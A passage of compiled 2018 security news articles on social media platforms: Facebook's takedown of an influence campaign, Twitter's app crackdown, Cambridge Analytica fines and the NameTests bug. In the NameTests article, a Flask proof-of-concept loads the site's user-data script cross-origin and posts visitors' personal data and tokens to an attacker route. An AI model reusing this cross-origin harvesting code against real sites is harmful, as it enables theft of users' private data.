The most followed Facebook Pages were “Aztlan Warriors,” “Black Elevation,” “Mindful Being,” and “Resisters.” The remaining Pages had between zero and ten followers, and the Instagram accounts had zero followers.
There were more than 9,500 organic posts created by these accounts on Facebook and one piece of content on Instagram.
They ran about 150 ads for approximately $11,000 on Facebook and Instagram, paid for in US and Canadian dollars. The first ad was created in April 2017, and the last was created in June 2018.
The Pages created about 30 events since May 2017. About half had fewer than 100 accounts interested in attending. The largest had approximately 4,700 accounts interested in attending, and 1,400 users said that they would attend.” said Gleicher.
Facebook announced it would start notifying users who were following the blocked accounts, as well as users who said they would attend events created by one of the suspended accounts and pages.

Facebook reported its findings to US law enforcement agencies, Congress, and other tech companies.

“Today’s disclosure is further evidence that the Kremlin continues to exploit platforms like Facebook to sow division and spread disinformation, and I am glad that Facebook is taking some steps to pinpoint and address this activity,” declared the Senate Intelligence Committee’s top Democrat Mark Warner.


Facebook Uncovers Political Influence Campaign Ahead of Midterms
1.8.2018 securityweek 
Social 

Facebook said Tuesday it shut down 32 fake pages and accounts involved in an apparent "coordinated" effort to stoke hot-button issues ahead of November midterm US elections, but could not identify the source although Russia is suspected of involvement.

It said the "bad actor" accounts on the world's biggest social network and its photo-sharing site Instagram could not be tied directly to Russian actors, who American officials say used the platform to spread disinformation ahead of the 2016 US presidential election.

The US intelligence community has concluded that Russia sought to sway the vote in Donald Trump's favor, and Facebook was a primary tool in that effort, using targeted ads to escalate political tensions and push divisive online content.

With the 2018 mid-terms barely three months away, Facebook founder Mark Zuckerberg announced his company's crackdown.

"One of my top priorities for 2018 is to prevent misuse of Facebook," Zuckerberg said on his own Facebook page.

"We build services to bring people closer together and I want to ensure we're doing everything we can to prevent anyone from misusing them to drive us apart."

Trump, now president, has repeatedly downplayed Kremlin efforts to interfere in US democracy.

Two weeks ago, he caused an international firestorm when he stood alongside Russian President Vladimir Putin and cast doubt on assertions that Russia tried to sabotage the vote.

But after Facebook's announcement, the White House stressed Trump opposed all efforts at election interference.

"The president has made it clear that his administration will not tolerate foreign interference into our electoral process from any nation state or other malicious actors," deputy press secretary Hogan Gidley told reporters.

Facebook said "some of the activity is consistent" with that of the Saint Petersburg-based Internet Research Agency -- the Russian troll farm that managed many false Facebook accounts used to influence the 2016 vote.

"But we don't believe the evidence is strong enough at this time to make public attribution to the IRA," Facebook chief security officer Alex Stamps said during a conference call with reporters.

Special Counsel Robert Mueller is heading a sprawling investigation into possible collusion with Russia by Trump's campaign to tip the vote toward the real estate tycoon.

Mueller has indicted the Russian group and 12 Russian hackers connected to the organization.

Facebook said it is shutting down 32 pages and accounts "engaged in coordinated inauthentic behavior," even though it may never be known for certain who was behind the operation.

The tech giant's investigation is at an early stage, but was revealed now because one of the pages being covertly operated was orchestrating a counter-protest to a white nationalism rally in Washington.

The coordinators of a deadly white-supremacist event in Charlottesville last year reportedly have been given a permit to hold a rally near the White House on August 12, the anniversary of the 2017 gathering.

Facebook said it will notify members of the social network who expressed interest in attending the counter-protest.

- US 'not doing' enough -

Facebook has briefed US law enforcement agencies, Congress and other tech companies about its findings.

"Today's disclosure is further evidence that the Kremlin continues to exploit platforms like Facebook to sow division and spread disinformation, and I am glad that Facebook is taking some steps to pinpoint and address this activity," said the Senate Intelligence Committee's top Democrat Mark Warner.

The panel's chairman, Republican Senator Richard Burr, said he was glad to see Facebook take a "much-needed step toward limiting the use of their platform by foreign influence campaigns."

"The goal of these operations is to sow discord, distrust and division," he added. "The Russians want a weak America."

US lawmakers have introduced multiple bills aimed at boosting election security.

While top Senate Democrat Chuck Schumer applauded Facebook's action, he said the Trump administration itself "is not doing close to enough" to protect elections.

Some of the most-followed pages that were shut down included "Resisters" and "Aztlan Warriors."

Facebook said some 290,000 users followed at least one of the pages.

"Resisters" enlisted support from real followers for an August protest in Washington against the far-right "Unite the Right" group.

Inauthentic pages dating back more than a year organized an array of real world events, all but two of which have taken place, according to Facebook.

The news comes just days after Facebook suffered the worst single-day evaporation of market value for any company, after missing revenue forecasts for the second quarter and offering soft growth projections.

Zuckerberg's firm says the slowdown will come in part due to its new approach to privacy and security, which helped experts uncover these so-called "bad actors."


Twitter removed more than 143,000 apps from the messaging service
28.7.2018 securityaffairs
Social

On Tuesday, Twitter announced it had removed more than 143,000 apps from the messaging service since April in a new crackdown initiative.
Last week, Twitter announced it had removed more than 143,000 apps from the messaging service since April in a new crackdown initiative aimed at “malicious” activity from automated accounts.

Twitter CEO Jack Dorsey (@jack) tweeted on March 1, 2018: “We’re committing Twitter to help increase the collective health, openness, and civility of public conversation, and to hold ourselves publicly accountable towards progress.”
The social media giant is restricting access to its application programming interfaces (APIs), which allow developers to automate interactions with the platform (e.g., posting tweets).

Spam and abuse are important problems for the platform: every day an impressive number of bots is used to influence sentiment on specific topics or to spread misinformation and racist content.

“We’re committed to providing access to our platform to developers whose products and services make Twitter a better place,” said Twitter senior product management director Rob Johnson.

“However, recognizing the challenges facing Twitter and the public — from spam and malicious automation to surveillance and invasions of privacy — we’re taking additional steps to ensure that our developer platform works in service of the overall health of conversation on Twitter.”

Twitter says the apps “violated our policies,” although it wouldn’t say how and it did not share details on revoked apps.

“We do not tolerate the use of our APIs to produce spam, manipulate conversations, or invade the privacy of people using Twitter,” he added.

“We’re continuing to invest in building out improved tools and processes to help us stop malicious apps faster and more efficiently.”

Cleaning up Twitter is a hard task. Since Tuesday, Twitter has deployed a new application process for developers who intend to use the platform’s APIs.

Twitter is going to ask them for details of how they will use the service.

“Beginning today, anyone who wants access to Twitter’s APIs should apply for a developer account using the new developer portal at developer.twitter.com. Once your application has been approved, you’ll be able to create new apps and manage existing apps on developer.twitter.com. Existing apps can also still be managed on apps.twitter.com.” Johnson added.

“We’re committed to supporting all developers who want to build high-quality, policy-compliant experiences using our developer platform and APIs, while reducing the impact of bad actors on our service,”

Twitter messaging service

However, there are many legitimate applications that use the Twitter APIs to automate processes, including emergency alerts.

Twitter also announced the introduction of new default app-level rate limits for common POST endpoints to fight the spamming through the platform.

“Alongside changes to the developer account application process, we’re introducing new default app-level rate limits for common POST endpoints, as well as a new process for developers to obtain high volume posting privileges. These changes will help cut down on the ability of bad actors to create spam on Twitter via our APIs, while continuing to provide the opportunity to build and grow an app or business to meaningful scale.” concludes Twitter.
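For legitimate developers, staying within these app-level limits mostly means building clients that back off instead of retrying aggressively. Below is a minimal sketch using the tweepy library (version 3.x assumed, placeholder credentials; the exact limit values live in Twitter’s developer documentation):

```python
# Minimal sketch of a policy-compliant automated posting client (placeholder
# credentials; tweepy 3.x assumed). wait_on_rate_limit makes the client sleep
# until the rate-limit window resets instead of hammering the POST endpoint.
import tweepy

auth = tweepy.OAuthHandler("CONSUMER_KEY", "CONSUMER_SECRET")
auth.set_access_token("ACCESS_TOKEN", "ACCESS_TOKEN_SECRET")

api = tweepy.API(auth,
                 wait_on_rate_limit=True,          # back off when throttled
                 wait_on_rate_limit_notify=True)   # log when a wait occurs

# A single, clearly attributed automated post -- the kind of use the new
# developer-review process is meant to allow.
api.update_status("Scheduled service notice: maintenance window starts at 02:00 UTC.")
```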


Twitter Curbs Access for 143,000 Apps in New Crackdown
26.7.2018 securityweek
Social

Twitter said Tuesday it had removed more than 143,000 apps from the messaging service since April in a fresh crackdown on "malicious" activity from automated accounts.

The San Francisco-based social network said it was tightening access to its application programming interfaces (APIs), which allow developers to make automated Twitter posts.

"We're committed to providing access to our platform to developers whose products and services make Twitter a better place," said Twitter senior product management director Rob Johnson.

"However, recognizing the challenges facing Twitter and the public -- from spam and malicious automation to surveillance and invasions of privacy -- we're taking additional steps to ensure that our developer platform works in service of the overall health of conversation on Twitter."

Johnson offered no details on the revoked apps, but Twitter has been under pressure over automated accounts or "bots" which spread misinformation or falsely amplify a person or political cause.

"We do not tolerate the use of our APIs to produce spam, manipulate conversations, or invade the privacy of people using Twitter," he said.

"We're continuing to invest in building out improved tools and processes to help us stop malicious apps faster and more efficiently."

As of Tuesday, any developer seeking access to create a Twitter app will have to go through a new application process, providing details of how they will use the service.

"We're committed to supporting all developers who want to build high-quality, policy-compliant experiences using our developer platform and APIs, while reducing the impact of bad actors on our service," Johnson said.

Automated accounts are not always malicious -- some are designed to tweet out emergency alerts, art exhibits or the release of a Netflix program -- but "bots" have been blamed for spreading hoaxes and misinformation in a bid to manipulate public opinion.


Facebook faces £500,000 fine in the U.K. over Cambridge Analytica scandal

19.7.2018 securityaffairs Social

Facebook has been fined £500,000 ($664,000) in the U.K. for its conduct in the Cambridge Analytica privacy scandal.
Facebook has been fined £500,000 in the U.K., the maximum fine allowed by the UK’s Data Protection Act 1998, for failing to protect users’ personal information.

Facebook- Cambridge Analytica

Political consultancy firm Cambridge Analytica improperly collected data of 87 million Facebook users and misused it.

“Today’s progress report gives details of some of the organisations and individuals under investigation, as well as enforcement actions so far.

This includes the ICO’s intention to fine Facebook a maximum £500,000 for two breaches of the Data Protection Act 1998.” reads the announcement published by the UK Information Commissioner’s Office.

“Facebook, with Cambridge Analytica, has been the focus of the investigation since February when evidence emerged that an app had been used to harvest the data of 50 million Facebook users across the world. This is now estimated at 87 million.

The ICO’s investigation concluded that Facebook contravened the law by failing to safeguard people’s information. It also found that the company failed to be transparent about how people’s data was harvested by others.”

This is the first possible financial punishment that Facebook is facing for the Cambridge Analytica scandal.

“A significant finding of the ICO investigation is the conclusion that Facebook has not been sufficiently transparent to enable users to understand how and why they might be targeted by a political party or campaign,” reads ICO’s report.

Obviously, the financial penalty is negligible compared to the revenues of the social networking giant, but it is a strong message to all companies, which must properly manage users’ personal information in compliance with the new General Data Protection Regulation (GDPR).

What would have happened if the regulation had already been in force at the time of disclosure?

Under the GDPR, the penalties allowed are much greater: fines can reach up to 4% of global turnover, which in Facebook’s case is estimated at $1.9 billion.

“Facebook has failed to provide the kind of protections they are required to under the Data Protection Act.” Elizabeth Denham, the UK’s Information Commissioner said. “People cannot have control over their own data if they don’t know or understand how it is being used. That’s why greater and genuine transparency about the use of data analytics is vital.”

Facebook still has a chance to respond to the ICO’s Notice of Intent before a final decision on the fine is made.

“In line with our approach, we have served Facebook with a Notice setting out the detail of our areas of concern and invited their representations on these and any action we propose,” concludes the ICO update on the investigation, published today by Information Commissioner Elizabeth Denham.

“Their representations are due later this month, and we have taken no final view on the merits of the case at this time. We will consider carefully any representations Facebook may wish to make before finalising our views,” the update adds.


Facebook Faces Australia Data Breach Compensation Claim
18.7.2018 securityweek 
Social

Facebook could face a hefty compensation bill in Australia after a leading litigation funder lodged a complaint with the country's privacy regulator over users' personal data shared with a British political consultancy.

The social networking giant admitted in April the data of up to 87 million people worldwide -- including more than 300,000 in Australia -- was harvested by Cambridge Analytica.

Under Australian law, all organisations must take "reasonable steps" to ensure personal information is held securely, and IMF Bentham has teamed up with a major law firm to lodge a complaint with the Office of the Australian Information Commissioner (OAIC).

The OAIC launched an investigation into the alleged breaches in April and, depending on its outcome, a class action could follow.

IMF said in a statement late Tuesday it was seeking "compensation for Facebook users arising from Facebook's alleged breaches of the Australian Privacy Principles contained in the Privacy Act 1988".

"The alleged breaches surround the circumstances in which a third party, Cambridge Analytica, gained unauthorised access to users' profiles and information.

"The complaint seeks financial recompense for the unauthorised access to, and use of, their personal data."

In its statement, IMF Bentham said it appeared Facebook learned of the breach in late 2015, but failed to tell users about it until this year.

IMF investment manager Nathan Landis told The Australian newspaper most awards for privacy breaches ranged between Aus$1,000 and Aus$10,000 (US$750-US$7,500).

This implies a potential compensation bill of between Aus$300 million and Aus$3 billion.

Facebook did not directly comment on the IMF Bentham action but a spokesperson told AFP Wednesday: "We are fully cooperating with the investigation currently underway by the Australian Privacy Commissioner.

"We will review any additional evidence that is made available when the UK Office of the Information Commissioner releases their report."


Britain to Fine Facebook Over Data Breach
18.7.2018 securityweek  Incident
Social

Britain's data regulator said Wednesday it will fine Facebook half a million pounds for failing to protect user data, as part of its investigation into whether personal information was misused ahead of the Brexit referendum.

The Information Commissioner's Office (ICO) began investigating the social media giant earlier this year, when evidence emerged that an app had been used to harvest the data of tens of millions of Facebook users worldwide.

In the worst ever public relations disaster for the social media giant, Facebook admitted that up to 87 million users may have had their data hijacked by British consultancy firm Cambridge Analytica, which was working for US President Donald Trump's 2016 campaign.

Cambridge Analytica, which also had meetings with the Leave.EU campaign ahead of Britain's EU referendum in 2016, denies the accusations and has filed for bankruptcy in the United States and Britain.

"In 2014 and 2015, the Facebook platform allowed an app... that ended up harvesting 87 million profiles of users around the world that was then used by Cambridge Analytica in the 2016 presidential campaign and in the referendum," Elizabeth Denham, the information commissioner, told BBC radio.

Wednesday's ICO report said: "The ICO's investigation concluded that Facebook contravened the law by failing to safeguard people's information."

Without detailing how the information may have been used, it said the company had "failed to be transparent about how people's data was harvested by others".

The ICO added that it plans to issue Facebook with the maximum available fine for breaches of the Data Protection Act -- an equivalent of $660,000 or 566,000 euros.

Because of the timing of the breaches, the ICO said it was unable to impose penalties that have since been introduced by the European General Data Protection Regulation, which would cap fines at 4.0 percent of Facebook's global turnover.

In Facebook's case this would amount to around $1.6 billion (1.4 billion euros).

"In the new regime, they would face a much higher fine," Denham said.

- 'Doing the right thing' -

"We are at a crossroads. Trust and confidence in the integrity of our democratic processes risk being disrupted because the average voter has little idea of what is going on behind the scenes," Denham said.

"New technologies that use data analytics to micro-target people give campaign groups the ability to connect with individual voters. But this cannot be at the expense of transparency, fairness and compliance with the law."

In May, Facebook chief Mark Zuckerberg apologised to the European Parliament for the "harm" caused.

EU Justice Commissioner Vera Jourova welcomed the ICO report.

"It shows the scale of the problem and that we are doing the right thing with our new data protection rules," she said.

"Everyone from social media firms, political parties and data brokers seem to be taking advantage of new technologies and micro-targeting techniques with very limited transparency and responsibility towards voters," she said.

"We must change this fast as no-one should win elections using illegally obtained data," she said, adding: "We will now assess what can we do at the EU level to make political advertising more transparent and our elections more secure."

- Hefty compensation bill -

The EU in May launched strict new data-protection laws allowing regulators to fine companies up to 20 million euros ($24 million) or four percent of annual global turnover.

But the ICO said because of the timing of the incidents involved in its inquiry, the penalties were limited to those available under previous legislation.

The next phase of the ICO's work is expected to be concluded by the end of October.

Erin Egan, chief privacy officer at Facebook, said: "We have been working closely with the ICO in their investigation of Cambridge Analytica, just as we have with authorities in the US and other countries. We're reviewing the report and will respond to the ICO soon."

The British fine comes as Facebook faces a potentially hefty compensation bill in Australia, where litigation funder IMF Bentham said it had lodged a complaint with regulators over the Cambridge Analytica breach -- thought to affect some 300,000 users in Australia.

IMF investment manager Nathan Landis told The Australian newspaper most awards for privacy breaches ranged between Aus$1,000 and Aus$10,000 (US$750-$7,500).

This implies a potential compensation bill of between Aus$300 million and Aus$3 billion.


Vietnam Activists Flock to 'Safe' Social Media After Cyber Crackdown
6.7.2018 securityweek
Social

Tens of thousands of Vietnamese social media users are flocking to a self-professed free speech platform to avoid tough internet controls in a new cybersecurity law, activists told AFP.

The draconian law requires internet companies to scrub critical content and hand over user data if Vietnam's Communist government demands it.

The bill, which is due to take effect from January 1, sparked outcry from activists, who say it is a chokehold on free speech in a country where there is no independent press and where Facebook is a crucial lifeline for bloggers.

The world's leading social media site has 53 million users in Vietnam, a country of 93 million.

Many activists are now turning to Minds, a US-based open-source platform, fearing Facebook could be complying with the new rules.

"We want to keep our independent voice and we also want to make a point to Facebook that we're not going to accept any censorship," Tran Vi, editor of activist site The Vietnamese, which is blocked in Vietnam, told AFP from Taiwan.

Some activists say they migrated to Minds after content removal and abuse from pro-government Facebook users.

Two editors' Facebook accounts were temporarily blocked and The Vietnamese Facebook page can no longer use the "instant article" tool to post stories.

Nguyen Chi Tuyen, an activist better known by his online handle Anh Chi, says he has moved to Minds as a secure alternative, though he will continue using Facebook and Twitter.

"It's more anonymous and a secretive platform," he said of Minds.

He has previously had to hand over personal details to Facebook to verify his identity and now fears that information could be used against him.

- 'Scary' law -

About 100,000 new active users have registered in Vietnam in less than a week, many posting on politics and current affairs, Minds founder and CEO Bill Ottman told AFP.

"This new cybersecurity law is scaring a lot of people for good reason," he said from Connecticut.

"It's certainly scary to think that you could not only be censored but have your private conversations given to a government that you don't know what they're going to use that for."

The surge of new users from Vietnam now accounts for nearly 10 percent of Minds' total user base of about 1.1 million.

Users are not required to register with personal data and all chats are encrypted.

Vietnam's government last year announced a 10,000-strong cybersecurity army tasked with monitoring incendiary material online.

In its unabashed defence of the new law, Vietnam has said it is aimed at protecting the regime and avoiding a "colour revolution", but refused to comment to AFP on Thursday.

Facebook told AFP it is reviewing the law and says it considers government requests to take down information in line with its Community Standards -- and pushes back when possible.

Google declined to comment on the new law when asked by AFP, but its latest transparency report showed that it had received 67 separate requests from the Vietnamese government to remove more than 6,500 items since 2009, the majority since early last year.

Most were taken down, though Google does not provide precise data on content removal compliance.

Ottman says countries like Vietnam are fighting a losing battle trying to control online expression.

"It's like burning books, it just causes more attention to be brought to those issues and it further radicalises those users because they're so upset that they're getting censored," he said.


Facebook Responding to US Regulators in Data Breach Probe

5.7.2018 securityweek  Social

Facebook acknowledged Tuesday it was facing multiple inquiries from US and British regulators about the major Cambridge Analytica user data scandal.

The leading social network offered no details but its admission confirmed reports of a widening investigation into the misuse of private data by Facebook and its partners.

"We are cooperating with officials in the US, UK and beyond," a Facebook spokesman said in response to an AFP query.

"We've provided public testimony, answered questions, and pledged to continue our assistance as their work continues."

The Washington Post reported that the Securities and Exchange Commission, Federal Trade Commission and FBI as well as the Justice Department are looking into the massive breach of users' personal data and how the company handled it.

Facebook shares closed the shortened Nasdaq trading day down 2.35 percent to $192.73, heading into an Independence Day holiday with investors mulling what effect the investigations may have on the California-based internet giant.

Facebook has admitted that up to 87 million users may have had their data hijacked by British consultancy Cambridge Analytica, which worked for US President Donald Trump during his 2016 campaign.

Facebook chief Mark Zuckerberg apologized to the European Parliament in May and said the social media giant is taking steps to prevent such a breach from happening again.

Zuckerberg said at a hearing in Brussels that it became clear in the last two years that Facebook executives didn't do enough to prevent the platform "from being used for harm."

Zuckerberg was grilled about the breach in US Congress in April.

It remains unclear what if any penalties Facebook may face from the latest requests but the tech giant is legally bound to comply with a 2011 consent decree with the FTC on protecting private user data.

Any SEC inquiry could look at whether Facebook adequately disclosed key information to investors.


The Social network giant Facebook confirms it shared data with 61 tech firms after 2015
3.7.2018 securityaffairs
Social

On Friday, Facebook provided a 748-page long report to Congress that confirms the social network shared data with at least 61 tech firms after 2015.
This is the worst period in the history of the social network: Facebook has now admitted to having shared users’ data with 61 tech firms.

The problem is that Facebook allowed tech companies and app developers to access its users’ data even after announcing, in 2015, that it had restricted third-party access to that data.

Immediately after the Cambridge Analytica privacy scandal that affected 87 million users, Facebook attempted to ease media pressure by confirming that it had restricted third-party access to its users’ data since May 2015.

On Friday, Facebook provided a 748-page long report to Congress that confirms the practice of sharing data with 61 tech firms after 2015.

The company also granted a “one-time” six-month extension to the companies to come into compliance with Facebook’s new privacy policy.

“In April 2014, we announced that we would more tightly restrict our platform APIs to prevent abuse. At that time, we made clear that existing apps would have a year to transition—at which point they would be forced (1) to migrate to the more restricted API and (2) be subject to Facebook’s new review and approval protocols.” reads the report.

“The vast majority of companies were required to make the changes by May 2015; a small number of companies (fewer than 100) were given a one-time extension of less than six months beyond May 2015 to come into compliance.”

In addition, the company admitted that a very small number of companies (fewer than 10) have had access to limited friends’ data as a result of API access that they received in the context of a beta test.

The social media firm also shared a list containing 52 companies that it has authorized to build versions of Facebook or Facebook features for their devices and products.

The list includes Acer, Amazon, Apple, Blackberry, Microsoft, Motorola/Lenovo, Samsung, Sony, Spotify, and the Chinese companies Huawei and Alibaba.

“The partnerships—which we call “integration partnerships”—began before iOS and Android had become the predominant ways people around the world accessed the internet on their mobile phones,” explained Facebook.

“We engaged companies to build integrations for a variety of devices, operating systems, and other products where we and our partners wanted to offer people a way to receive Facebook or Facebook experiences,” the document reads. “These integrations were built by our partners, for our users, but approved by Facebook.”

The social network confirmed it has already ended 38 of these 52 partnerships; an additional seven will be discontinued by the end of July, and another one by the end of October. The company will continue its partnerships with Tobii (an accessibility app that enables people with ALS to access Facebook), Amazon and Apple, and will also keep working with Mozilla, Alibaba and Opera.

“Three partnerships will continue: (1) Tobii, an accessibility app that enables people with ALS to access Facebook; (2) Amazon; and (3) Apple, with whom we have agreements that extend beyond October 2018. We also will continue partnerships with Mozilla, Alibaba and Opera— which enable people to receive notifications about Facebook in their web browsers—but their integrations will not have access to friends’ data.” added the company.

Privacy advocates and security experts have called into question the way the social network managed users’ data, especially after 2015.

Just a few days ago, I reported the news that a popular third-party quiz app named NameTests was found exposing data of up to 120 million Facebook users.


Facebook is notifying 800,000 users affected by a blocking bug
3.7.2018 securityaffairs
Social

Yesterday the social network giant Facebook started notifying 800,000 users affected by a blocking bug. The company has already fixed it.
When a Facebook user blocks someone, the blocked user is no longer able to interact with them: they cannot see the blocker’s posts, start conversations with them on Messenger, or add them as a friend.

Facebook discovered a bug affecting its platform that allowed blocked users to interact with the accounts that had blocked them. As a result, blocked users were able to see some of the content posted by the individuals who had blocked them, and may also have been able to contact them via Messenger.

The issue was introduced on May 29, and the social network giant addressed it on June 5.

“Starting today we are notifying over 800,000 users about a bug in Facebook and Messenger that unblocked some people they had blocked. The bug was active between May 29 and June 5 — and while someone who was unblocked could not see content shared with friends, they could have seen things posted to a wider audience. For example pictures shared with friends of friends. ” wrote Facebook Chief Privacy Officer Erin Egan.

According to Egan, a user who had been blocked could not see content shared only with friends, but may have been shown content shared with “friends of friends.”

Egan clarified that blocking also automatically unfriends users if they were previously friends.

Below are the details shared by Egan on this specific bug:

It did not reinstate any friend connections that had been severed;
83% of people affected by the bug had only one person they had blocked temporarily unblocked; and
Someone who was unblocked might have been able to contact people on Messenger who had blocked them.
Facebook has fixed the bug and everyone has been blocked again; the company is sending a notification to the affected accounts encouraging them to check their block lists.

Facebook bug


Facebook Notifies 800,000 Users of Blocking Bug
3.7.2018 securityweek 
Social

Facebook on Monday started notifying 800,000 users affected by a bug that resulted in blocked individuals getting temporarily unblocked. The social media giant also detailed some new API restrictions designed to better protect user information.

When you block someone on Facebook, you prevent them from seeing your posts, starting conversations on Messenger, or adding you as a friend. However, a Facebook and Messenger bug introduced on May 29 and addressed on June 5 led to users being able to see some of the content posted by individuals who had blocked them.

According to Facebook Chief Privacy Officer Erin Egan, blocked users could not see content shared only with friends, but they may have been shown content shared with “friends of friends.” The blockee may have also been able to contact the blocker via Messenger.

Egan clarified that friend connections were not reinstated as a result of the bug and 83 percent of impacted users had only one blocked person temporarily unblocked. Affected users will see a notification in their account.

New API restrictions and changes

Facebook also announced on Monday additional measures taken following the Cambridge Analytica incident, in which personal data on tens of millions of users was improperly shared with the British political consultancy through an app.

The social media giant previously shared some information on the steps taken to better protect elections and user data, and it has now announced new changes affecting application developers.

Developers have been informed that several APIs have been or will be deprecated, including the Graph API Explorer App, Profile Expression Kit, Trending API, the Signal tool, Trending Topics, Hashtag Voting, Topic Search, Topic Insights, Topic Feed, and Public Figure. The Trending and Topic APIs are part of the Media Solutions toolkit.

Some APIs will be deprecated – in some cases due to low usage – while others will be restricted.

Developers will once again be allowed to search for Facebook pages via the Pages API, but they will need Page Public Content Access permissions, which can only be obtained via the app review process.
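As a hedged sketch of what such a reviewed-app call might look like (the Graph API version and parameter names below are assumptions based on the contemporary API; consult Facebook’s documentation for the authoritative form):

```python
# Hedged sketch: searching public Pages through the Graph API from an app that has
# passed review and holds the Page Public Content Access permission. The endpoint
# version and exact parameters are assumptions, not confirmed by the article.
import requests

ACCESS_TOKEN = "APP_OR_PAGE_ACCESS_TOKEN"  # placeholder

resp = requests.get(
    "https://graph.facebook.com/v3.1/search",
    params={
        "type": "page",
        "q": "coffee shop",
        "fields": "id,name",
        "access_token": ACCESS_TOKEN,
    },
    timeout=10,
)
resp.raise_for_status()
for page in resp.json().get("data", []):
    print(page["id"], page.get("name"))
```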

As for marketing tools, Facebook announced that the Marketing API can only be used by reviewed apps, and that it’s introducing new app review permissions for the Live Video and Lead Ads Retrieval APIs.


Facebook App Exposed Data of 120 Million Users
2.7.2018 securityweek 
Social

A recently addressed privacy bug on Nametests.com resulted in the data of over 120 million users who took personality quizzes on Facebook being publicly exposed.

Patched as part of Facebook’s Data Abuse Bounty Program, the vulnerability resided in Nametests.com serving users’ data to any third-party that requested it, something that shouldn’t normally happen.

Facebook launched its Data Abuse Bounty Program in April, as part of its efforts to improve user privacy following the Cambridge Analytica scandal. The company also updated its terms on privacy and data sharing, but also admitted to tracking people over the Internet, even those who are not Facebook users.

The issue in Nametests.com was reported by Inti De Ceukelaire, who discovered that, when loading a personality test, the website would fetch all of his personal information from http://nametests.com/appconfig_user and display it on the page.

Websites shouldn’t normally be allowed to access the information, as web browsers do prevent such behavior. The data requested from Nametests.com, however, was wrapped in JavaScript, meaning that it could be shared with other websites.

“Since NameTests displayed their user’s personal data in JavaScript file, virtually any website could access it when they would request it,” the researcher explains.

To verify that this was indeed happening, he set up a website that connected to Nametests.com and would fetch information about the visitor. The access token provided by Nametests.com could also be used to gain access to the visitor’s posts, photos and friends, depending on the permissions granted.
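A minimal sketch of that kind of proof-of-concept site is shown below (not the researcher’s actual code). Because script includes are exempt from the same-origin policy, any page that embeds the JavaScript-wrapped endpoint can read whatever globals it defines; the global variable name and the /collect route are assumptions.

```python
# Minimal sketch of the kind of proof-of-concept site described above (not the
# researcher's code). A third-party page can embed the JavaScript-wrapped endpoint
# with a <script> tag, which browsers load cross-origin, and then read the globals
# it defines. The global name `user_data` and the /collect route are assumptions.
from flask import Flask

app = Flask(__name__)

POC_PAGE = """
<!doctype html>
<html><body>
  <script src="http://nametests.com/appconfig_user"></script>
  <script>
    // Hypothetical: assumes the wrapped payload defines a readable global.
    fetch('/collect', {method: 'POST', body: JSON.stringify(window.user_data)});
  </script>
</body></html>
"""

@app.route("/")
def index():
    return POC_PAGE

@app.route("/collect", methods=["POST"])
def collect():
    # In a real attack, the harvested profile data (and access token) would land here.
    return "", 204

if __name__ == "__main__":
    app.run()
```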

“It would only take one visit to our website to gain access to someone’s personal information for up to two months,” De Ceukelaire says.

Another issue the researcher discovered was that the user information would continue to be exposed even after they deleted the application. With no log out functionality available, users would have had to manually delete the cookies on their devices to prevent their data from being leaked.

The bug was reported to Facebook’s Data Abuse program on April 22 and a fix was rolled out by June 25, when the researcher noticed that third-parties could no longer access visitors’ personal information as before.

The vulnerability could “have affected Facebook information people shared with nametests.com. To be on the safe side, we revoked the access tokens for everyone on Facebook who has signed up to use this app. So people will need to re-authorize the app in order to continue using it,” Facebook said.

The social platform also donated $8,000 (they apparently doubled the $4,000 bounty because the researcher chose to donate it to charity) to the Freedom of the Press foundation.

“I also got a response from NameTests. The public relations team claims that, according to the data and knowledge they have, they found no evidence of abuse by a third party. They also state that they have implemented additional tests to find such bugs and avoid them in the future,” the researcher notes.


Twitter shared details about its strategy for fighting spam and bots
30.6.2018 securityaffairs
Social

Twitter provided some details on new security processes aimed at preventing malicious automation and spam.
The tech giant also shared data on the success obtained with the introduction of the new security measures.
Social media platforms are a privileged tool for psyops and malicious campaigns; for this reason, Twitter rolled out new features to detect and prevent abuse.

Threat actors make large use of bots to spread propaganda and malicious links, and social media platforms are spending significant effort on threat mitigation.

Twitter claims that in May it challenged more than 9.9 million potentially automated accounts used for malicious activity every week, a significant increase from 6.4 million in December 2017.
The social media platform said that the new security measures drastically reduced spam reports received from users, from 25,000 daily reports in March to 17,000 in May.
The company is removing 214% more spam accounts compared to 2017. Twitter suspended over 142,000 apps in the first quarter of 2018; most of them were shut down within a week, or even within hours, of being registered.

Twitter introduced measures to evaluate account metrics in near-real time.

The platform is able to recognize bot activity by detecting synchronized operations conducted by multiple accounts.
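Twitter has not published its detection logic, but the general idea of flagging synchronized behavior can be illustrated with a simple sketch: accounts that push near-identical text within the same short time window are grouped together and flagged.

```python
# Illustrative only -- not Twitter's actual detection logic. Flags groups of
# accounts that post near-identical text within the same short time window,
# a simple signal of synchronized (bot-like) activity.
from collections import defaultdict

def flag_synchronized_accounts(posts, window_seconds=30, min_accounts=5):
    """posts: iterable of (account_id, unix_timestamp, text) tuples."""
    buckets = defaultdict(set)
    for account_id, timestamp, text in posts:
        key = (text.strip().lower(), int(timestamp) // window_seconds)
        buckets[key].add(account_id)
    # Identical text pushed by many distinct accounts in one window is suspicious.
    return [accounts for accounts in buckets.values() if len(accounts) >= min_accounts]
```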

Twitter announced it will remove follower and engagement counts from accounts flagged as suspicious that have been put into a read-only state until they pass a challenge, such as confirming a phone number.

“So, if we put an account into a read-only state (where the account can’t engage with others or Tweet) because our systems have detected it behaving suspiciously, we now remove it from follower figures and engagement counts until it passes a challenge, like confirming a phone number.” reads the blog post published by Twitter.

“We also display a warning on read-only accounts and prevent new accounts from following them to help prevent inadvertent exposure to potentially malicious content,”
The company also introduced measures to audit existing accounts and control the creation of new ones.
Twitter
Twitter is increasing checks in the sign-up process to make it difficult to register spam accounts, for example by requiring more interaction from the user, such as the confirmation of an email address.

“As part of this audit, we’re imminently taking action to challenge a large number of suspected spam accounts that we caught as part of an investigation into misuse of an old part of the signup flow,” continues the post. “These accounts are primarily follow spammers, who in many cases appear to have automatically or bulk followed verified or other high-profile accounts suggested to new accounts during our signup flow.”

The company is investing in behavioral detection, its engineers are working to introduce measures that one detected suspicions activities by challenging the owner of the account in actions that request its interaction.


Facebook Quiz app NameTests left 120 Million users’ data exposed online
30.6.2018 securityaffairs
Social

Experts discovered that a third-party quiz app called NameTests exposed the data of up to 120 million Facebook users.
A bug on Nametests.com exposed the data of over 120 million users who took personality quizzes on Facebook; the good news is that the flaw was addressed through Facebook's Data Abuse Bounty Program, launched in April.

The issue resided in Nametests.com, which shared users’ data with any third party that requested it.

The flaw was reported by the researcher Inti De Ceukelaire, who explained that when loading a personality test, the website displays personal information loaded from http://nametests.com/appconfig_user.

